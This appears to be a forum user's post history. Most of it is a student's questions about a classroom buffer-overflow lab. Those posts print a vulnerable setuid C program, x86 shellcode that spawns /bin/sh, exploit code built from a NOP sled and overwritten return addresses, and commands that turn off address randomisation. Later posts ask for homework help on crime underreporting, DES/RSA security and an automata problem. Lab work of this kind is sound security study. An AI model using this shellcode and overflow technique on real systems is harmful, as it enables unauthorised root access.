
EonsNearby

  1. I recently found and read this article that talks about practically the same thing I am trying to do: http://web-agent.appspot.com/insecure.org/stf/smashstack.html Based on this, it sounds like I am getting the exploit correctly, but it just is not generating a root shell. "stack" is a set-root-UID program while "exploit" is a user-owned program. I am just supposed to run stack as a normal user and not root, which I can do, but I can't get a root shell. Now that I know that I am getting the exploit, can someone make a suggestion as to why I am not getting a root shell?
  2. I tried increasing the size of bufferSize and codeSize (not at the same time), but it still just generates a shell with user privileges. I've tried assigning a value to buffer[517], but even doing that won't generate a shell with root privileges. I know that the overflow occurs in the stack.c file, but I need to fill the "buffer" in exploit.c with the appropriate contents. I just don't know if what I am putting in it are the appropriate contents. I did find this as a possible solution, but I can't get it to work. I don't know if it will be of help or not, but:

     ```c
     /* A program that creates a file containing code for launching shell */
     #include <stdlib.h>
     #include <stdio.h>
     #include <string.h>

     char shellcode[] =
         "\x31\xc0"             /* xorl    %eax,%eax              */
         "\x50"                 /* pushl   %eax                   */
         /* We have to use //sh instead of /sh, because we need 32-bit
            padding and /sh only uses 24 bits. Linux will ignore the
            extra slash, so we don't have a problem. */
         "\x68""//sh"           /* pushl   $0x68732f2f            */
         "\x68""/bin"           /* pushl   $0x6e69622f            */
         "\x89\xe3"             /* movl    %esp,%ebx              */
         /* Load the arguments for the function on the stack */
         "\x50"                 /* pushl   %eax                   */
         "\x53"                 /* pushl   %ebx                   */
         "\x89\xe1"             /* movl    %esp,%ecx              */
         "\x99"                 /* cdql                           */
         /* Call exec */
         "\xb0\x0b"             /* movb    $0x0b,%al              */
         "\xcd\x80"             /* int     $0x80                  */
     ;

     int main(int argc, char **argv)
     {
         char buffer[500];
         FILE *badfile;
         int i;
         unsigned char address[4];

         /* Initialize buffer with 0x90 (NOP instruction) */
         memset(&buffer, 0x90, sizeof(buffer));

         /* You need to fill the buffer with appropriate contents here */
         memcpy(&buffer[sizeof(buffer) - 100], shellcode, sizeof(shellcode));

         /* Blow away the return address */
         /* Don't forget your endian-ness!!!!! */
         buffer[16] = 0x00; /* CHANGE ME (so this should be something like 0xB4 instead of 0x00) */
         buffer[17] = 0x00; /* CHANGE ME */
         buffer[18] = 0x00; /* CHANGE ME */
         buffer[19] = 0x00; /* CHANGE ME */

         /* Save the contents to the file "badfile" */
         badfile = fopen("./badfile", "w");
         fwrite(buffer, sizeof(buffer), 1, badfile);
         fclose(badfile);
     }
     ```

     I don't know what to change those "0x00" to. Before I was supposed to execute any of this, I had to execute this in root:

     ```
     echo 0 > /proc/sys/kernel/randomize_va_space
     ```

     The lab however says I need to execute the following in root instead:

     ```
     sysctl -w kernel.randomize_va_space=0
     ```

     However, when I do the second one, then when I try to execute "stack", I get a "Segmentation fault".
  3. I am stuck on a lab assignment where I need to use a version of Ubuntu in VMware Player to write some .c files that will use a buffer overflow vulnerability to generate a shell that has root privileges. I can only use the following 2 files:

     stack.c

     ```c
     #include <stdio.h>
     #include <string.h>   /* needed for strcpy() */

     int bof(char *str)
     {
         char buffer[12];

         //BO Vulnerability
         strcpy(buffer, str);

         return 1;
     }

     int main(int argc, char* argv[])
     {
         char str[517];
         FILE *badfile;

         badfile = fopen("badfile", "r");
         fread(str, sizeof(char), 517, badfile);
         bof(str);

         printf("Returned Properly\n");
         return 1;
     }
     ```

     exploit.c

     ```c
     #include <stdlib.h>
     #include <stdio.h>
     #include <string.h>

     char shellcode[]=
         "\x31\xc0"
         "\x50"
         "\x68""//sh"
         "\x68""/bin"
         "\x89\xe3"
         "\x50"
         "\x53"
         "\x89\xe1"
         "\x99"
         "\xb0\x0b"
         "\xcd\x80"
     ;

     void main(int argc, char **argv)
     {
         char buffer[517];
         FILE *badfile;

         /* Initialize buffer with 0x90 (NOP instruction) */
         memset(&buffer, 0x90, 517);

         /* You need to fill the buffer with appropriate contents here */

         /* Save the contents to the file "badfile" */
         badfile = fopen("./badfile", "w");
         fwrite(buffer, 517, 1, badfile);
         fclose(badfile);
     }
     ```

     Here are the changes I made to exploit.c:

     ```c
     #include <stdio.h>
     #include <stdlib.h>
     #include <string.h>

     #define DEFAULT_OFFSET 350

     char shellcode[]=
         "\x31\xc0"
         "\x50"
         "\x68""//sh"
         "\x68""/bin"
         "\x89\xe3"
         "\x50"
         "\x53"
         "\x89\xe1"
         "\x99"
         "\xb0\x0b"
         "\xcd\x80"
     ;

     unsigned long get_sp(void)
     {
         __asm__("movl %esp,%eax");
     }

     void main(int argc, char **argv)
     {
         char buffer[517];
         FILE *badfile;
         char *ptr;
         long *a_ptr, ret;

         int offset = DEFAULT_OFFSET;
         int codeSize = sizeof(shellcode);
         int buffSize = sizeof(buffer);

         if (argc > 1) offset = atoi(argv[1]); //allows for command line input

         ptr = buffer;
         a_ptr = (long *) ptr;

         /* Initialize buffer with 0x90 (NOP instruction) */
         memset(buffer, 0x90, buffSize);

         /* A trailing backslash on a // comment would splice the next
            line into the comment, so the markers below do not end in one. */
         //----------------------BEGIN FILL BUFFER----------------------//
         ret = get_sp() + offset;
         printf("Return Address: 0x%x\n", get_sp());
         printf("Address: 0x%x\n", ret);

         ptr = buffer;
         a_ptr = (long *) ptr;

         int i;
         for (i = 0; i < 300; i += 4)
             *(a_ptr++) = ret;

         /* The array is named shellcode; "code" was never declared */
         for (i = 486; i < codeSize + 486; ++i)
             buffer[i] = shellcode[i - 486];

         buffer[buffSize - 1] = '\0';
         //-----------------------END FILL BUFFER-----------------------//

         /* Save the contents to the file "badfile" */
         badfile = fopen("./badfile", "w");
         fwrite(buffer, 517, 1, badfile);
         fclose(badfile);
     }
     ```

     I execute the following in a terminal:

     ```
     $ su root
     $ Password]
     # gcc -o stack -fno-stack-protector stack.c
     # chmod 4755 stack
     # exit
     $ gcc -o exploit exploit.c
     $ ./exploit
     $ ./stack
     ```

     The "badfile" is created and a shell is generated, but the shell only has basic user privileges instead of root privileges. Can someone help me with this?
  4. This isn't a formal paper or anything, it is just an answer to a discussion question. As such, there are not multiple paragraphs. Heck, I don't even think it is supposed to be in paragraph format since I never indent.
  5. He doesn't want that. He just wants why some crimes go unreported in major industries.
  6. The question is the following: Why is crime reporting so low in "major industries"? I am supposed to have a 1 page, double spaced response. However, I have only been able to come up with a little more than half a page, which is the following:

     One possible reason crime reporting is so low is to give the impression that the company is secure. This is a common strategy that is used to keep people from panicking and getting distracted from their assigned duties. This can also provide mild deterrence, because some hackers may not want to attack a company that has not had a successful attack against it. They may just want to target companies and institutions that have suffered attacks before. Another possible reason crime reporting is so low in major industries is to protect the industry's pride and dignity. For better or worse, those two can cause a company to fail. For example, if a major industry suffered from an attack and word got out about it, people would believe that the industry is not very secure. This could lead to people not wanting to work there or people not wanting to financially support it (like investing in the industry’s stock or purchasing products made by the industry). Also, other, competing companies that have not suffered an attack may exploit this weakness to insinuate their superiority over the attacked company.

     Can someone offer up some suggestions that could get me the desired length?
  7. Okay, I am able to find out that use of those encryption schemes is secure enough for some services, but I still cannot fill out 1 page with it. This is all I am able to come up with:

     Question 2

     This is similar to asking why people drive in cars or fly in airplanes even though they are dangerous. I think that the primary reason is that they are reasonably secure for civil applications. There are also several widely used encryption algorithms that are easy to modify, to make breaking them difficult. For example, DES can be made incredibly difficult and expensive to hack. If the number of possible keys is adequately large enough, “to dissuade the attacker from attempting exhaustively testing keys, and no easier attack on the algorithm can be found, then the designer of the algorithm has succeeded in providing adequate security.” [1] DES is also the only publicly available encryption algorithm to have been endorsed by the U.S. government. [1] In regards to RSA, there are some benefits it has that make it popular. For one, its key size can be increased to make hacking take longer. Also, anyone can use it without having to pay any fees, even if it is used in a private or commercial product. RSA can also perform encryption, decryption, and signature verification with the same two functions.

     Works Cited

     [1] http://media.johnwiley.com.au/product_data/excerpt/28/07803535/0780353528.pdf

     I also don't really get your hint. Is encryption itself still regulated in your country, or is it just the import and export of encryption systems? Also, were the encryption techniques "insecure" like DES and RSA?
  8. My main problem is that I can't really find anything about why people use "insecure" encryption algorithms (aside from my 2 initial ideas, but I can't really stretch that to 1 page). All I can really find out is what some widely used, "insecure" encryption algorithms are and why they are "insecure".
  9. I've only been looking into RSA and DES since that is what the question has specified. The only real reasons I have come up with as to why people use them is that they are both very common encryption algorithms and they are easier to "change" than other, more secure encryption algorithms.
  10. I am in a Computer Network Security class, and I have to answer 2 different discussion questions (each answer has to be about a page long). I am having trouble with one of them (the other I have yet to try to answer), so I was wondering if someone could help me with the question. Here it is: Most of the encryption standards that are being used such as RSA and DES have not been formally proven to be safe. Why then do we take them to be secure - what evidence do we have? Any help will be appreciated.
  11. I am in an Automata, Complexity, and Compatability class, and I was given a confusing assignment question. It is question 3, the one that starts on the bottom of page 1 and runs to page 2, on the pdf document attached. I have asked others for help, but they claim that there is a typo on question 3. They claim that where it says A≅C and B≅C , the B≅C should have been B ≅ D . However, when I contacted my teacher about it, he claims that is not a typo and he meant to write that. Because of it, they claim that the statement cannot be proven. I was just wondering if anyone here could help me get started with it, if it can be proven